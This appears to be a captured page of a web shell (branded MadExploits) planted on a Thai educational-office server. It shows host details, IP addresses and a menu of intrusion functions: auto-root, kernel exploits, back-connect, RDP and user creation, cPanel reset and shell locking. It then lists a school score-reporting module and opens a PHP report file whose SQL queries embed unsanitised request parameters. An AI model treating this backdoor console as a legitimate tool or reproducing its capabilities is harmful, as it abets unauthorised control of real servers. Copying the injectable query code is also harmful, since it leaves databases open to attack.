Linux ns8.secondary29.go.th 2.6.32-754.28.1.el6.x86_64 #1 SMP Wed Mar 11 18:38:45 UTC 2020 x86_64
Apache/2.2.15 (CentOS)
: 122.154.134.11 | : 122.154.134.9
Cant Read [ /etc/named.conf ]
5.6.40
apache
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
amss /
modules /
achievement /
main /
[ HOME SHELL ]
Name
Size
Permission
Action
add_score_1.php
9.99
KB
-rwxr-xr-x
add_score_2.php
10.23
KB
-rwxr-xr-x
add_score_3.php
11.14
KB
-rwxr-xr-x
getxml_onet.php
6.86
KB
-rwxr-xr-x
livesearch.php
778
B
-rwxr-xr-x
permission.php
9.65
KB
-rwxr-xr-x
report1.php
9.17
KB
-rwxr-xr-x
report11.php
10.97
KB
-rwxr-xr-x
report1_1.php
8.89
KB
-rwxr-xr-x
report1_1_mobile.php
7.08
KB
-rw-r--r--
report1_2.php
12.3
KB
-rwxr-xr-x
report2.php
6.09
KB
-rwxr-xr-x
report21.php
8.62
KB
-rwxr-xr-x
report2_1.php
6.54
KB
-rwxr-xr-x
report2_2.php
5.26
KB
-rwxr-xr-x
report3.php
6.09
KB
-rwxr-xr-x
report31.php
8.63
KB
-rwxr-xr-x
report3_1.php
6.55
KB
-rwxr-xr-x
report3_2.php
5.26
KB
-rwxr-xr-x
report4.php
9.62
KB
-rwxr-xr-x
report41.php
11.64
KB
-rwxr-xr-x
report4_1.php
10.09
KB
-rw-r--r--
report4_1_mobile.php
8.61
KB
-rw-r--r--
report4_2.php
10.56
KB
-rw-r--r--
report5.php
6.09
KB
-rwxr-xr-x
report51.php
8.62
KB
-rwxr-xr-x
report5_1.php
6.54
KB
-rwxr-xr-x
report5_2.php
5.26
KB
-rwxr-xr-x
report6.php
18.25
KB
-rwxr-xr-x
report61.php
19.65
KB
-rwxr-xr-x
report6_1.php
18.52
KB
-rw-r--r--
report6_1_mobile.php
9.04
KB
-rw-r--r--
report6_2.php
13.14
KB
-rw-r--r--
report7.php
6.09
KB
-rwxr-xr-x
report71.php
8.62
KB
-rwxr-xr-x
report7_1.php
6.54
KB
-rwxr-xr-x
report7_2.php
5.26
KB
-rwxr-xr-x
report_nt.php
9.3
KB
-rw-r--r--
report_nt_group.php
7.84
KB
-rw-r--r--
report_onet.php
10.99
KB
-rw-r--r--
report_onet_group.php
12.21
KB
-rw-r--r--
report_onet_xx.php
7.88
KB
-rw-r--r--
test_import.php
6.71
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : report1.php
<?php /** ensure this file is being included by a parent file */ defined( '_VALID_' ) or die( 'Direct Access to this location is not allowed.' ); ?> <script src="https://cdnjs.cloudflare.com/ajax/libs/Chart.js/2.4.0/Chart.js"></script> <?php $class_ar[6]="ชั้นประถมศึกษาปีที่ 6"; $class_ar[9]="ชั้นมัธยมศึกษาปีที่ 3"; $class_ar[12]="ชั้นมัธยมศึกษาปีที่ 6"; if(!(isset($_REQUEST['school_code']))){ $_REQUEST['school_code']=""; } $sql = "select distinct test_class from achievement_main where test_type='1' order by test_class limit 1"; $qury = mysqli_query($connect,$sql); $result=mysqli_fetch_array($qury); if(!(isset($_REQUEST['class_index']))){ $_REQUEST['class_index']=$result['test_class']; } ?> <center> <h2>คะแนนสอบ O-NET แบบที่ 1</h2> <h3><?php if(isset($_REQUEST['class_index'])){ echo $class_ar[$_REQUEST['class_index']]; } ?></h3></center> <?php echo "<form id='frm1' name='frm1'>"; echo "<table width='95%' align='center'>"; echo "<Tr><td align='right'>"; ?> ค้นหาโรงเรียน <input type="text" size="15" onkeyup="showResult(this.value)"> <div id="livesearch"></div> <?php echo "</td></tr>"; echo"<tr><td align='right'>"; echo "<Select name='ed_year' size='1'>"; $sql = "select distinct ed_year from achievement_main where test_type='1' and test_class='$_REQUEST[class_index]' order by ed_year desc "; $dbquery = mysqli_query($connect,$sql); $year=1; While ($result_year = mysqli_fetch_array($dbquery)){ $year_ar[$year]=$result_year[ed_year]; if(!(isset($_REQUEST['ed_year']))){ echo "<option value=$result_year[ed_year]>ปีการศึกษา $result_year[ed_year]</option>"; } else{ if($_REQUEST['ed_year']==$result_year['ed_year']){ echo "<option value=$result_year[ed_year] selected>ปีการศึกษา $result_year[ed_year]</option>"; } else{ echo "<option value=$result_year[ed_year]>ปีการศึกษา $result_year[ed_year]</option>"; } } $year++; } echo "</select>"; echo "<Select name='class_index' size='1'>"; if($_REQUEST['class_index']=='6'){ $select_class_6="selected"; } else if($_REQUEST['class_index']=='9'){ $select_class_9="selected"; } else if($_REQUEST['class_index']=='12'){ $select_class_12="selected"; } echo "<option value =6 $select_class_6>ชั้น ป.6</option>"; echo "<option value =9 $select_class_9>ชั้น ม.3</option>"; echo "<option value =12 $select_class_12>ชั้น ม.6</option>"; echo "</select>"; echo "<Select name='school_code' size='1'>"; echo '<option value ="" >ภาพรวมระดับ สพท. โรงเรียนรัฐบาล</option>' ; if($_REQUEST['school_code']=="2"){ echo '<option value ="2" selected>ภาพรวมระดับ สพท. โรงเรียนเอกชน</option>' ; } else{ echo '<option value ="2" >ภาพรวมระดับ สพท. โรงเรียนเอกชน</option>' ; } $sql = "select achievement_main.school ,system_school.school_name from achievement_main left join system_school on achievement_main.school=system_school.school_code where achievement_main.test_type='1' and achievement_main.test_class='$_REQUEST[class_index]' GROUP BY achievement_main.school order by system_school.school_type, system_school.school_code"; $dbquery = mysqli_query($connect,$sql); While ($result = mysqli_fetch_array($dbquery)){ if($_REQUEST['school_code']==""){ echo "<option value=$result[school]>$result[school] $result[school_name]</option>"; } else{ if($_REQUEST['school_code']==$result['school']){ echo "<option value=$result[school] selected>$result[school] $result[school_name]</option>"; } else{ echo "<option value=$result[school]>$result[school] $result[school_name]</option>"; } } } echo "</select>"; echo " <INPUT TYPE='button' name='smb' value='เลือก' onclick='goto_display(1)'>"; echo "</td></tr></table>"; echo "</form>"; //ส่วนของปีการศึกษา $strQuery = "select distinct ed_year from achievement_main where test_type='1' and test_class='$_REQUEST[class_index]' order by ed_year desc limit 1"; $result = mysqli_query($connect,$strQuery); $ors = mysqli_fetch_array($result); if(!(isset($_REQUEST['ed_year']))){ $ed_year=$ors['ed_year']; } else{ $ed_year=$_REQUEST['ed_year']; } if($_REQUEST['school_code']==""){ $strQuery = "select avg(thai) as thai, avg(math) as math, avg(science) as science, avg(social) as social, avg(english) as english, avg(health) as health, avg(art) as art, avg(vocation) as vocation, avg(score_avg) as score_avg from achievement_main left join system_school on achievement_main.school=system_school.school_code where achievement_main.test_type='1' and achievement_main.test_class='$_REQUEST[class_index]' and achievement_main.ed_year='$ed_year' and achievement_main.score_avg>'0' and system_school.school_type='1' "; } else if($_REQUEST['school_code']=="2"){ $strQuery = "select avg(thai) as thai, avg(math) as math, avg(science) as science, avg(social) as social, avg(english) as english, avg(health) as health, avg(art) as art, avg(vocation) as vocation, avg(score_avg) as score_avg from achievement_main left join system_school on achievement_main.school=system_school.school_code where achievement_main.test_type='1' and achievement_main.test_class='$_REQUEST[class_index]' and achievement_main.ed_year='$ed_year' and achievement_main.score_avg>'0' and system_school.school_type='2' "; } else{ $strQuery = "select thai, math, science, social, english, health, art, vocation, score_avg from achievement_main where test_type='1' and test_class='$_REQUEST[class_index]' and ed_year='$ed_year' and school='$_REQUEST[school_code]' "; } $result = mysqli_query($connect,$strQuery); $ors = mysqli_fetch_array($result); $labels[0] = "ภาษาไทย"; $data[0] = $ors['thai']; $labels[1] = "คณิตศาสตร์"; $data[1] = $ors['math']; $labels[2] = "วิทยาศาสตร"; $data[2] = $ors['science']; $labels[3] = "สังคมศึกษา"; $data[3] = $ors['social']; $labels[4] = "ภาษาอังกฤษ"; $data[4] = $ors['english']; $labels[5] = "เฉลี่ย"; $data[5] = $ors['score_avg']; ?> <table align="center"><tr><td> <div class="chart-container" style="position: relative; height:30vh; width:50vw"> <canvas id="myChart"></canvas> </div> </td></tr></table> <script> function goto_display(val){ if(val==1){ callfrm("?option=achievement&task=main/report1"); } } function showResult(str) { var return_file="report1"; if (str.length==0) { document.getElementById("livesearch").innerHTML=""; document.getElementById("livesearch").style.border="0px"; return; } if (window.XMLHttpRequest) { // code for IE7+, Firefox, Chrome, Opera, Safari xmlhttp=new XMLHttpRequest(); } else { // code for IE6, IE5 xmlhttp=new ActiveXObject("Microsoft.XMLHTTP"); } xmlhttp.onreadystatechange=function() { if (this.readyState==4 && this.status==200) { document.getElementById("livesearch").innerHTML=this.responseText; document.getElementById("livesearch").style.border="1px solid #A5ACB2"; } } xmlhttp.open("GET","modules/achievement/main/livesearch.php?q="+str+"&return_file="+return_file,true); xmlhttp.send(); } </script> <script> var ctx = document.getElementById("myChart"); var myChart = new Chart(ctx, { type: 'bar', data: { labels: ["ภาษาไทย", "คณิตศาสตร์", "วิทยาศาสตร์", "สังคมศึกษา", "ภาษาอังกฤษ", "เฉลี่ย"], datasets: [{ label: 'คะแนน O-NET ปีการศึกษา <?php echo $ed_year ?>', data: <?php echo json_encode($data, JSON_NUMERIC_CHECK);?>, backgroundColor: [ 'rgba(255, 99, 132, 0.2)', 'rgba(54, 162, 235, 0.2)', 'rgba(255, 206, 86, 0.2)', 'rgba(75, 192, 192, 0.2)', 'rgba(153, 102, 255, 0.2)', 'rgba(255, 159, 64, 0.2)' ], borderColor: [ 'rgba(255,99,132,1)', 'rgba(54, 162, 235, 1)', 'rgba(255, 206, 86, 1)', 'rgba(75, 192, 192, 1)', 'rgba(153, 102, 255, 1)', 'rgba(255, 159, 64, 1)' ], borderWidth: 1 }] }, options: { scales: { yAxes: [{ ticks: { beginAtZero:true } }] } } }); </script>
Close